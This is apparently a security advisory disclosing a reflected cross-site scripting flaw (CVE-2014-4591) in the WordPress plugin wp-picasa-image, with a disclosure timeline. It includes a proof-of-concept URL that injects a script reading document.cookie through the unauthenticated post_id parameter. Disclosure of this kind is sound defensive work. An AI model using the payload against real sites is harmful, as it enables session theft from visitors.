wp-plugin : wp-picasa-image – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-picasa-image

 

Effected Version : 1.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/wp-picasa-image/picasa_upload.php?post_id=%27%26type%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26

Vulnerable Parameter : post_id

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Closed
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4591

 
Plugin Description :
 
You just need to copy the address of the pictures from Picasa album, then this plugin will help you modify the address to show in you posts. If the address of picture is not from Picasa, it won't do anything.
The plugin has been embeded into backstage editor, so you don't need to modify the theme files.

If you found any problem, please let me know.

Leave a Reply

Your email address will not be published. Required fields are marked *